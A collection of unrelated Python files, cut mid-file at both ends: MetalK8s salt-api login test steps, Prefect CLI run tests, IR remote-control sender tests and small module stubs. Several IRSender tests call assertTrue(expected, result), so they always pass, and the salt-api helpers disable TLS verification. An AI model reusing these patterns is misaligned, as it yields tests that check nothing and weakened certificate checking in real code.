json=[
{
'client': 'local',
'tgt': '*',
'fun': 'test.ping',
},
],
headers={
'X-Auth-Token': context['salt-api']['token'],
},
verify=False,
)
result_data = result.json()
assert result_data['return'][0] != []
@then('authentication fails')
def authentication_fails(host, context):
assert context['salt-api']['login-status-code'] == 401
@then(parsers.parse("we can invoke '{modules}' on '{targets}'"))
def invoke_module_on_target(host, context, modules, targets):
assert {targets: ast.literal_eval(modules)} in context['salt-api']['perms']
@then(parsers.parse("we have '{perms}' perms"))
def have_perms(host, context, perms):
assert perms in context['salt-api']['perms']
# }}}
# Helpers {{{
def _login_salt_api_sa(address, k8s_client, sa_name, sa_namespace):
service_account = k8s_client.read_namespaced_service_account(
name=sa_name, namespace=sa_namespace
)
secret = k8s_client.read_namespaced_secret(
name=service_account.secrets[0].name, namespace=sa_namespace
)
token = base64.decodebytes(secret.data['token'].encode('utf-8'))
return _salt_api_login(
address, sa_name, token, 'Bearer'
)
def _get_salt_api_address(host, version):
SALT_API_PORT = 4507
cmd_cidr = ' '.join([
'salt-call', 'pillar.get',
'networks:control_plane',
'saltenv=metalk8s-{version}'.format(version=version),
'--out', 'json',
])
with host.sudo():
cidr_output = host.check_output(cmd_cidr)
cidr = json.loads(cidr_output)['local']
cmd_ip = ' '.join([
'salt-call', '--local',
'network.ip_addrs',
'cidr="{cidr}"'.format(cidr=cidr),
'--out', 'json',
])
with host.sudo():
cmd_output = host.check_output(cmd_ip)
ip = json.loads(cmd_output)['local'][0]
return '{}:{}'.format(ip, SALT_API_PORT)
def _salt_api_login(address, username, token, token_type):
response = requests.post(
'https://{}/login'.format(address),
data={
'eauth': 'kubernetes_rbac',
'username': username,
'token': token,
'token_type': token_type,
},
verify=False,
)
result = {
'url': 'https://{}'.format(address),
'token': None,
'perms': [],
'login-status-code': response.status_code,
}
if response.status_code == 200:
json_data = response.json()
result['token'] = json_data['return'][0]['token']
result['perms'] = json_data['return'][0]['perms']
return result
# }}}
|
from abc import ABC, abstractmethod
from machine.plugin import PluginType
class Resource(ABC):
@abstractmethod
def __call__(self) -> PluginType:
raise NotImplementedError
|
"""
Top level CLI commands.
"""
from .dcos_docker import dcos_docker
from .dcos_vagrant import dcos_vagrant
__all__ = [
'dcos_docker',
'dcos_vagrant',
]
|
from mygtestabcde.Ml import Ml
|
import textwrap
import sys
import os
import json
import pytest
import pendulum
from click.testing import CliRunner
from unittest.mock import MagicMock
from prefect import Flow
from prefect.engine.state import Scheduled
from prefect.run_configs import UniversalRun
from prefect.storage import Local as LocalStorage
from prefect.backend import FlowRunView, FlowView
from prefect.cli.run import load_json_key_values, run
SUCCESSFUL_LOCAL_STDOUT = """
Retrieving local flow... Done
Running flow locally...
Flow run succeeded!
""".lstrip()
FAILURE_LOCAL_STDOUT = """
Retrieving local flow... Done
Running flow locally...
Flow run failed!
""".lstrip()
TEST_FLOW_VIEW = FlowView(
flow_id="flow-id",
name="flow-name",
settings={"key": "value"},
run_config=UniversalRun(env={"ENV": "VAL"}),
flow=Flow("flow"),
serialized_flow=Flow("flow").serialize(),
archived=False,
project_name="project",
flow_group_labels=["label"],
core_version="0.0.0",
storage=LocalStorage(stored_as_script=True, path="fake-path.py"),
)
TEST_FLOW_RUN_VIEW = FlowRunView(
flow_run_id="flow-run-id",
name="flow-run-name",
flow_id="flow-id",
state=Scheduled(message="state-1"),
states=[],
parameters={"param": "value"},
context={"foo": "bar"},
labels=["label"],
updated_at=pendulum.now(),
run_config=UniversalRun(),
)
@pytest.fixture()
def hello_world_flow_file(tmpdir):
flow_file = tmpdir.join("flow.py")
flow_file.write_text(
"""
from prefect.hello_world import hello_flow
""".strip(),
encoding="UTF-8",
)
return str(flow_file)
@pytest.fixture()
def multiflow_file(tmpdir):
flow_file = tmpdir.join("flow.py")
flow_file.write_text(
textwrap.dedent(
"""
from prefect import Flow
flow_a = Flow("a")
flow_b = Flow("b")
"""
),
encoding="UTF-8",
)
return str(flow_file)
@pytest.fixture()
def context_flow_file(tmpdir):
flow_file = tmpdir.join("flow.py")
flow_file.write_text(
textwrap.dedent(
"""
from prefect import Flow, task
@task(log_stdout=True)
def print_context_x():
from prefect import context
print(context.get("x"))
with Flow("context-test-flow") as flow:
print_context_x()
"""
),
encoding="UTF-8",
)
return str(flow_file)
@pytest.fixture()
def runtime_failing_flow(tmpdir):
flow_file = tmpdir.join("flow.py")
flow_file.write_text(
textwrap.dedent(
"""
from prefect import Flow, task
@task(log_stdout=True)
def fail_task():
raise ValueError("Some error")
with Flow("fail-test-flow") as flow:
fail_task()
"""
),
encoding="UTF-8",
)
return str(flow_file)
@pytest.fixture()
def at_load_failing_flow(tmpdir):
flow_file = tmpdir.join("flow.py")
flow_file.write_text(
textwrap.dedent(
"""
from prefect import Flow
with Flow("fail-test-flow") as flow:
reference_an_unknown_var
"""
),
encoding="UTF-8",
)
return str(flow_file)
@pytest.fixture()
def cloud_mocks(monkeypatch):
class CloudMocks:
FlowView = MagicMock()
FlowRunView = MagicMock()
Client = MagicMock()
watch_flow_run = MagicMock()
mocks = CloudMocks()
monkeypatch.setattr("prefect.cli.run.FlowView", mocks.FlowView)
monkeypatch.setattr("prefect.cli.run.FlowRunView", mocks.FlowRunView)
monkeypatch.setattr("prefect.cli.run.Client", mocks.Client)
monkeypatch.setattr("prefect.cli.run.watch_flow_run", mocks.watch_flow_run)
return mocks
@pytest.mark.parametrize(
"input,output",
[
("2", 2),
("2.0", 2.0),
('"2.0"', "2.0"),
("foo", "foo"),
('"foo"', "foo"), # auto-quoted
('{"key": "value"}', {"key": "value"}),
],
)
def test_load_json_key_values(input, output):
assert load_json_key_values([f"test={input}"], "")["test"] == output
def test_run_help():
result = CliRunner().invoke(run, ["--help"])
assert not result.exit_code
assert "Run a flow" in result.output
assert "Examples:" in result.output
@pytest.mark.parametrize(
"options",
(
["--name", "hello", "--id", "fake-id"],
["--project", "hello", "--path", "fake-id"],
["--project", "hello", "--id", "fake-id"],
["--module", "hello", "--id", "fake-id"],
),
)
def test_run_lookup_help_too_many_options(options):
result = CliRunner().invoke(run, options)
assert result.exit_code
assert "Received too many options to look up the flow" in result.output
assert (
"Look up a flow to run with one of the following option combinations"
in result.output
)
def test_run_lookup_help_no_options():
result = CliRunner().invoke(run, "--param foo=1")
assert result.exit_code
assert "Received no options to look up the flow" in result.output
assert (
"Look up a flow to run with one of the following option combinations"
in result.output
)
def test_run_wraps_parameter_file_parsing_exception(tmpdir):
params_file = tmpdir.join("params.json")
params_file.write_text("not-valid-json", encoding="UTF-8")
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", "--param-file", str(params_file)]
)
assert result.exit_code
assert "Failed to parse JSON" in result.output
def test_run_wraps_parameter_file_not_found_exception(tmpdir):
params_file = tmpdir.join("params.json")
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", "--param-file", str(params_file)]
)
assert result.exit_code
assert "Parameter file does not exist" in result.output
@pytest.mark.parametrize("kind", ["param", "context"])
def test_run_wraps_parameter_and_context_json_parsing_exception(tmpdir, kind):
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", f"--{kind}", 'x="foo"1']
)
assert result.exit_code
assert (
f"Failed to parse JSON for {kind.replace('param', 'parameter')} 'x'"
in result.output
)
def test_run_automatically_quotes_simple_strings():
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", "--param", "name=foo"]
)
assert not result.exit_code
assert "Parameters: {'name': 'foo'}" in result.output
@pytest.mark.parametrize("kind", ["path", "module"])
def test_run_local(tmpdir, kind, caplog, hello_world_flow_file):
location = hello_world_flow_file if kind == "path" else "prefect.hello_world"
result = CliRunner().invoke(run, [f"--{kind}", location])
assert not result.exit_code
assert result.output == SUCCESSFUL_LOCAL_STDOUT
# FlowRunner logs are displayed
assert "Hello World" in caplog.text
@pytest.mark.parametrize("kind", ["path", "module"])
def test_run_local_allows_selection_from_multiple_flows(
monkeypatch, multiflow_file, kind
):
monkeypatch.syspath_prepend(os.path.dirname(os.path.abspath(multiflow_file)))
location = multiflow_file if kind == "path" else "flow"
result = CliRunner().invoke(run, [f"--{kind}", location, "--name", "b"])
assert not result.exit_code
assert result.output == SUCCESSFUL_LOCAL_STDOUT
@pytest.mark.parametrize("kind", ["path", "module"])
def test_run_local_asks_for_name_with_multiple_flows(tmpdir, multiflow_file, kind):
if kind == "module":
# Extend the sys.path so we can pull from the file like a module
orig_sys_path = sys.path.copy()
sys.path.insert(0, os.path.dirname(os.path.abspath(multiflow_file)))
location = multiflow_file if kind == "path" else "flow"
result = CliRunner().invoke(run, [f"--{kind}", location])
assert result.exit_code
assert (
f"Found multiple flows at {location!r}: 'a', 'b'\n\nSpecify a flow name to run"
in result.output
)
if kind == "module":
sys.path = orig_sys_path
@pytest.mark.parametrize("log_level", ["ERROR", "DEBUG"])
def test_run_local_log_level(tmpdir, caplog, log_level):
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", "--log-level", log_level]
)
assert not result.exit_code
assert result.output == SUCCESSFUL_LOCAL_STDOUT
# Hello World is _not_ an error level log and should not be displayed then
if log_level == "ERROR":
assert "Hello World" not in caplog.text
assert "INFO" not in caplog.text
else:
assert "Hello World" in caplog.text
assert "INFO" in caplog.text
assert "DEBUG" in caplog.text
def test_run_local_respects_quiet(caplog):
result = CliRunner().invoke(run, ["--module", "prefect.hello_world", "--quiet"])
assert not result.exit_code
assert result.output == ""
# Flow run logs are still happening for local runs
assert "Hello World" in caplog.text
def test_run_local_respects_no_logs(caplog):
result = CliRunner().invoke(run, ["--module", "prefect.hello_world", "--no-logs"])
assert not result.exit_code
# Run output still occurs
assert result.output == SUCCESSFUL_LOCAL_STDOUT
# Flow run logs are silenced
assert caplog.text == ""
def test_run_local_passes_parameters(caplog):
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", "--param", 'name="foo"']
)
assert not result.exit_code
# A configured section will apppear now that a parameter is set
for line in SUCCESSFUL_LOCAL_STDOUT:
assert line in result.output
assert "Configured local flow run\n└── Parameters: {'name': 'foo'}" in result.output
# Parameter was used by the flow
assert "Hello Foo" in caplog.text
def test_run_local_passes_parameters_from_file(caplog, tmpdir):
params_file = tmpdir.join("params.json")
params_file.write_text(json.dumps({"name": "foo"}), encoding="UTF-8")
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", "--param-file", str(params_file)]
)
assert not result.exit_code
# A configured section will apppear now that a parameter is set
for line in SUCCESSFUL_LOCAL_STDOUT:
assert line in result.output
assert "Configured local flow run\n└── Parameters: {'name': 'foo'}" in result.output
# Parameter was used by the flow
assert "Hello Foo" in caplog.text
def test_run_local_passes_context(caplog, context_flow_file):
result = CliRunner().invoke(
run, ["--path", context_flow_file, "--context", 'x="custom-context-val"']
)
assert not result.exit_code
# A configured section will apppear now that the context is set
for line in SUCCESSFUL_LOCAL_STDOUT:
assert line in result.output
assert (
"Configured local flow run\n└── Context: {'x': 'custom-context-val'}"
in result.output
)
# Parameter was used by the flow
assert "custom-context-val" in caplog.text
def test_run_passes_context(caplog, context_flow_file):
result = CliRunner().invoke(
run, ["--path", context_flow_file, "--context", 'x="custom-context-val"']
)
assert not result.exit_code
# A configured section will apppear now that the context is set
for line in SUCCESSFUL_LOCAL_STDOUT:
assert line in result.output
assert (
"Configured local flow run\n└── Context: {'x': 'custom-context-val'}"
in result.output
)
# Parameter was used by the flow
assert "custom-context-val" in caplog.text
def test_run_local_handles_flow_run_failure(caplog, runtime_failing_flow):
result = CliRunner().invoke(run, ["--path", runtime_failing_flow])
assert not result.exit_code
assert result.output == FAILURE_LOCAL_STDOUT
# Flow runner logged exception
assert "ValueError: Some error" in caplog.text
def test_run_local_handles_flow_load_failure_with_script_issue(at_load_failing_flow):
result = CliRunner().invoke(run, ["--path", at_load_failing_flow])
assert result.exit_code
assert "Retrieving local flow... Error" in result.output
assert "Traceback" in result.output
@pytest.mark.skipif(
sys.platform == "win32", reason="Full traceback displayed on Windows"
)
def test_run_local_handles_flow_load_failure_with_missing_file(tmpdir):
missing_file = str(tmpdir.join("file"))
result = CliRunner().invoke(run, ["--path", missing_file])
assert result.exit_code
assert "Retrieving local flow... Error" in result.output
# Instead of a traceback there is a short error
assert "Traceback" not in result.output
assert f"File does not exist: {missing_file!r}" in result.output
def test_run_local_handles_flow_load_failure_with_missing_module(tmpdir):
missing_file = str(tmpdir.join("file"))
result = CliRunner().invoke(run, ["--module", "my_very_unique_module_name"])
assert result.exit_code
assert "Retrieving local flow... Error" in result.output
# Instead of a traceback there is a short error
assert "Traceback" not in result.output
assert "No module named 'my_very_unique_module_name'" in result.output
def test_run_local_handles_flow_load_failure_with_missing_module_attr(tmpdir):
missing_file = str(tmpdir.join("file"))
result = CliRunner().invoke(run, ["--module", "prefect.foobar"])
assert result.exit_code
assert "Retrieving local flow... Error" in result.output
# Instead of a traceback there is a short error
assert "Traceback" not in result.output
assert "Module 'prefect' has no attribute 'foobar'" in result.output
@pytest.mark.parametrize(
"cli_args,cloud_kwargs",
[
(
["--param", "a=2", "--param", "b=[1,2,3]"],
dict(parameters={"a": 2, "b": [1, 2, 3]}),
),
(
["--context", "a=1", "--context", 'b={"nested": 2}'],
dict(context={"a": 1, "b": {"nested": 2}}),
),
(["--label", "foo", "--label", "bar"], dict(labels=["foo", "bar"])),
(["--run-name", "my-run"], dict(run_name="my-run")),
(
["--log-level", "DEBUG"],
dict(
run_config=UniversalRun(
# Notice this tests for ENV merging
env={"ENV": "VAL", "PREFECT__LOGGING__LEVEL": "DEBUG"}
)
),
),
(
# No logs does not alter the log level for cloud runs, we just don't query
# for them in `watch_flow_run`
["--no-logs"],
dict(),
),
],
)
def test_run_cloud_creates_flow_run(cloud_mocks, cli_args, cloud_kwargs):
cloud_mocks.FlowView.from_flow_id.return_value = TEST_FLOW_VIEW
result = CliRunner().invoke(run, ["--id", "flow-id"] + cli_args)
assert not result.exit_code
cloud_kwargs.setdefault("parameters", {})
cloud_kwargs.setdefault("context", {})
cloud_kwargs.setdefault("labels", None)
cloud_kwargs.setdefault("run_name", None)
cloud_kwargs.setdefault("run_config", None)
cloud_mocks.Client().create_flow_run.assert_called_once_with(
flow_id=TEST_FLOW_VIEW.flow_id,
**cloud_kwargs,
)
def test_run_cloud_handles_create_flow_run_failure(cloud_mocks):
cloud_mocks.FlowView.from_flow_id.return_value = TEST_FLOW_VIEW
cloud_mocks.Client().create_flow_run.side_effect = ValueError("Foo!")
result = CliRunner().invoke(run, ["--id", "flow-id"])
assert result.exit_code
assert "Creating run for flow 'flow-name'... Error" in result.output
assert "Traceback" in result.output
assert "ValueError: Foo!" in result.output
def test_run_cloud_handles_keyboard_interrupt_during_create_flow_run(cloud_mocks):
cloud_mocks.FlowView.from_flow_id.return_value = TEST_FLOW_VIEW
cloud_mocks.Client().create_flow_run.side_effect = KeyboardInterrupt
result = CliRunner().invoke(run, ["--id", "flow-id"])
assert not result.exit_code
assert "Creating run for flow 'flow-name'..." in result.output
assert "Keyboard interrupt detected! Aborting..." in result.output
assert "Aborted." in result.output
def test_run_cloud_handles_keyboard_interrupt_during_flow_run_info(cloud_mocks):
# This test differs from `...interrupt_during_create_flow_run` in that the flow
# run is created and the user has cancelled during metadata retrieval so we need
# to actually cancel the run
cloud_mocks.FlowView.from_flow_id.return_value = TEST_FLOW_VIEW
cloud_mocks.Client().create_flow_run.return_value = "fake-run-id"
cloud_mocks.FlowRunView.from_flow_run_id.side_effect = KeyboardInterrupt
result = CliRunner().invoke(run, ["--id", "flow-id"])
assert not result.exit_code
assert "Creating run for flow 'flow-name'..." in result.output
assert "Keyboard interrupt detected! Aborting..." in result.output
assert "Cancelled flow run." in result.output
cloud_mocks.Client().cancel_flow_run.assert_called_once_with(
flow_run_id="fake-run-id"
)
def test_run_cloud_respects_quiet(cloud_mocks):
cloud_mocks.Client().create_flow_run.return_value = "fake-run-id"
result = CliRunner().invoke(run, ["--id", "flow-id", "--quiet"])
assert not result.exit_code
assert result.output == "fake-run-id\n"
@pytest.mark.parametrize("watch", [True, False])
def test_run_cloud_watch(cloud_mocks, watch):
cloud_mocks.Client().create_flow_run.return_value = "fake-run-id"
result = CliRunner().invoke(
run, ["--id", "flow-id"] + (["--watch"] if watch else [])
)
assert not result.exit_code
if watch:
cloud_mocks.watch_flow_run.assert_called_once()
assert cloud_mocks.watch_flow_run.call_args[1]["flow_run_id"] == "fake-run-id"
else:
cloud_mocks.watch_flow_run.assert_not_called()
def test_run_cloud_watch_respects_no_logs(cloud_mocks):
result = CliRunner().invoke(run, ["--id", "flow-id", "--watch", "--no-logs"])
assert not result.exit_code
cloud_mocks.watch_flow_run.assert_called_once()
assert cloud_mocks.watch_flow_run.call_args[1]["stream_logs"] is False
def test_run_cloud_lookup_by_flow_id(cloud_mocks):
result = CliRunner().invoke(run, ["--id", "flow-id"])
assert not result.exit_code
assert "Looking up flow metadata... Done" in result.output
cloud_mocks.FlowView.from_flow_id.assert_called_once_with("flow-id")
def test_run_cloud_lookup_by_flow_group_id(cloud_mocks):
cloud_mocks.FlowView.from_flow_id.side_effect = ValueError() # flow id is not found
cloud_mocks.FlowView.from_flow_group_id.return_value = TEST_FLOW_VIEW
result = CliRunner().invoke(run, ["--id", "flow-id"])
assert not result.exit_code
assert "Looking up flow metadata... Done" in result.output
cloud_mocks.FlowView.from_flow_id.assert_called_once_with("flow-id")
@pytest.mark.parametrize("with_project", [True, False])
def test_run_cloud_lookup_by_name(cloud_mocks, with_project):
result = CliRunner().invoke(
run,
["--name", "flow-name"]
+ (["--project", "project-name"] if with_project else []),
)
assert not result.exit_code
assert "Looking up flow metadata... Done" in result.output
expected = {"flow_name": "flow-name"}
if with_project:
expected["project_name"] = "project-name"
cloud_mocks.FlowView.from_flow_name.assert_called_once_with(**expected)
def test_run_cloud_handles_ids_not_found(cloud_mocks):
cloud_mocks.FlowView.from_flow_id.side_effect = ValueError() # flow id is not found
cloud_mocks.FlowView.from_flow_group_id.side_effect = ValueError()
result = CliRunner().invoke(run, ["--id", "flow-id"])
assert result.exit_code
assert "Looking up flow metadata... Error" in result.output
assert "Failed to find flow id or flow group id" in result.output
assert "Traceback" not in result.output
def test_run_cloud_displays_name_lookup_errors(cloud_mocks):
cloud_mocks.FlowView.from_flow_name.side_effect = ValueError("Example error")
result = CliRunner().invoke(run, ["--name", "foo"])
assert result.exit_code
assert "Looking up flow metadata... Error" in result.output
# TODO: Note this error message could be wrapped for a better UX
assert "Example error" in result.output
def test_run_cloud_handles_project_without_name(cloud_mocks):
cloud_mocks.FlowView.from_flow_name.side_effect = ValueError("No results found")
result = CliRunner().invoke(run, ["--project", "foo"])
assert result.exit_code
assert "Looking up flow metadata... Error" in result.output
assert (
"Missing required option `--name`. Cannot look up a flow by project without "
"also passing a name." in result.output
)
def test_run_cloud_displays_flow_run_data(cloud_mocks):
cloud_mocks.FlowRunView.from_flow_run_id.return_value = TEST_FLOW_RUN_VIEW
cloud_mocks.Client.return_value.get_cloud_url.return_value = "fake-url"
result = CliRunner().invoke(run, ["--id", "flow-id"])
assert not result.exit_code
assert (
textwrap.dedent(
"""
└── Name: flow-run-name
└── UUID: flow-run-id
└── Labels: ['label']
└── Parameters: {'param': 'value'}
└── Context: {'foo': 'bar'}
└── URL: fake-url
"""
)
in result.output
)
|
import os
import unittest
import yaml
from remote_controller.ir_sender import IRSender
FILE_PATH = os.path.dirname(__file__)
ACTIONS_PATH = '../resources/commands/commands-actions.yml'
class IRSenderTest(unittest.TestCase):
def setUp(self):
with open(os.path.join(FILE_PATH, ACTIONS_PATH), 'r') as stream:
try:
actions = yaml.load(stream)
except yaml.YAMLError as exception:
actions = None
print(exception)
self.__device = 'lg'
self.__ir_sender = IRSender(self.__device, actions, True)
def test_send_raw_power_command(self):
command = 'KEY_POWER'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_power_command(self):
command = 'POWER'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_POWER')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_ok_command(self):
command = 'KEY_OK'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_ok_command(self):
command = 'OK'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_OK')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_list_command(self):
command = 'KEY_LIST'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_list_command(self):
command = 'LIST'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_LIST')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_undo_command(self):
command = 'KEY_UNDO'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_undo_command(self):
command = 'UNDO'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_UNDO')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_back_command(self):
command = 'KEY_BACK'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_back_command(self):
command = 'BACK'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_BACK')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_info_command(self):
command = 'KEY_INFO'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_info_command(self):
command = 'INFO'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_INFO')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_exit_command(self):
command = 'KEY_EXIT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_exit_command(self):
command = 'EXIT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_EXIT')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_menu_command(self):
command = 'KEY_MENU'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_menu_command(self):
command = 'MENU'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_MENU')]
result = self.__ir_sender.send(command, None)
self.assertTrue(expected, result)
def test_send_raw_mute_command(self):
command = 'KEY_MUTE'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertTrue(expected, result)
def test_send_mute_command(self):
command = 'MUTE'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_MUTE')]
result = self.__ir_sender.send(command, None)
self.assertTrue(expected, result)
def test_send_raw_config_command(self):
command = 'KEY_CONFIG'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertTrue(expected, result)
def test_send_config_command(self):
command = 'SETTINGS'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CONFIG')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_video_command(self):
command = 'KEY_VIDEO'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_input_command(self):
command = 'INPUT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VIDEO')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_screen_command(self):
command = 'KEY_SCREEN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_screen_command(self):
command = 'SCREEN_RATIO'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_SCREEN')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_volume_up_command(self):
command = 'KEY_VOLUMEUP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_volume_up_command(self):
command = 'VOLUME_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEUP')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_volume_down_command(self):
command = 'KEY_VOLUMEDOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_volume_down_command(self):
command = 'VOLUME_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEDOWN')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_channel_up_command(self):
command = 'KEY_CHANNELUP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_channel_up_command(self):
command = 'CHANNEL_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELUP')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_channel_down_command(self):
command = 'KEY_CHANNELDOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_channel_down_command(self):
command = 'CHANNEL_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELDOWN')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_key_up_command(self):
command = 'KEY_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertTrue(expected, result)
def test_send_key_up_command(self):
command = 'MOVE_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_UP')]
result = self.__ir_sender.send(command, None)
self.assertTrue(expected, result)
def test_send_raw_key_down_command(self):
command = 'KEY_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_key_down_command(self):
command = 'MOVE_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_DOWN')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_key_right_command(self):
command = 'KEY_RIGHT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_key_right_command(self):
command = 'MOVE_RIGHT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_RIGHT')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_key_left_command(self):
command = 'KEY_LEFT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_key_left_command(self):
command = 'MOVE_LEFT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_LEFT')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_composite_channel_up_command(self):
command = 'CHANNEL_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELUP'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELUP'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELUP')]
result = self.__ir_sender.send(command, 3)
self.assertEqual(expected, result)
def test_composite_channel_down_command(self):
command = 'CHANNEL_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELDOWN'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELDOWN'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELDOWN')]
result = self.__ir_sender.send(command, 3)
self.assertEqual(expected, result)
def test_composite_volume_up_command(self):
command = 'VOLUME_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEUP'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEUP')]
result = self.__ir_sender.send(command, 2)
self.assertEqual(expected, result)
def test_composite_volume_down_command(self):
command = 'VOLUME_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEDOWN'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEDOWN'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEDOWN')]
result = self.__ir_sender.send(command, 3)
self.assertEqual(expected, result)
# Move
def test_composite_move_up_command(self):
command = 'MOVE_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_UP')]
result = self.__ir_sender.send(command, 1)
self.assertEqual(expected, result)
def test_composite_move_down_command(self):
command = 'MOVE_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_DOWN'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_DOWN'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_DOWN')]
result = self.__ir_sender.send(command, 3)
self.assertEqual(expected, result)
def test_composite_move_left_command(self):
command = 'MOVE_LEFT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_LEFT'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_LEFT'),
